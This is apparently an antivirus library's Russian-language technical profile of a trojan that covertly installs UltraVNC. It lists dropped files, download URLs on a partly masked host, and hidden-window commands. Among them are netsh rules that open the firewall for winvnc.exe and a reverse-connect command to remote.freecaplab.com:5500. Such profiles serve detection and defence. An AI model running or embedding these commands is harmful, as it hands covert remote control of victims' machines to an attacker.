Техническая информация
- '' (загружен из сети Интернет)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="winvnc.exe" dir=in action=allow program="%WINDIR%\winvnc.exe" enable=yes
- %WINDIR%\asycfilt.dll
- %WINDIR%\comcat.dll
- %WINDIR%\google.exe
- %WINDIR%\msvbvm60.dll
- %WINDIR%\oleaut32.dll
- %WINDIR%\olepro32.dll
- %WINDIR%\vb6ko.dll
- %WINDIR%\vb6stkit.dll
- %WINDIR%\securevncplugin.dsm
- %WINDIR%\ultravnc.ini
- %WINDIR%\winvnc.exe
- http://re####.freecaplab.com/download/Google/UltraVNC.ini
- http://re####.freecaplab.com/download/Google/winvnc.exe
- http://re####.freecaplab.com/download/Google/SecureVNCPlugin.dsm
- http://re####.freecaplab.com/api/remote/remote_action.html
- DNS ASK google.com
- DNS ASK re####.freecaplab.com
- ClassName: 'WinVNC Tray Icon' WindowName: ''
- '%WINDIR%\google.exe'
- '%WINDIR%\winvnc.exe' -id:1045 -autoreconnect ID:1045 -connect remote.freecaplab.com::5500 -run
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall delete rule name="winvnc.exe"' (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="winvnc.exe" dir=in action=allow program="%WINDIR%\winvnc.exe" enable=yes' (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall delete rule name="winvnc.exe"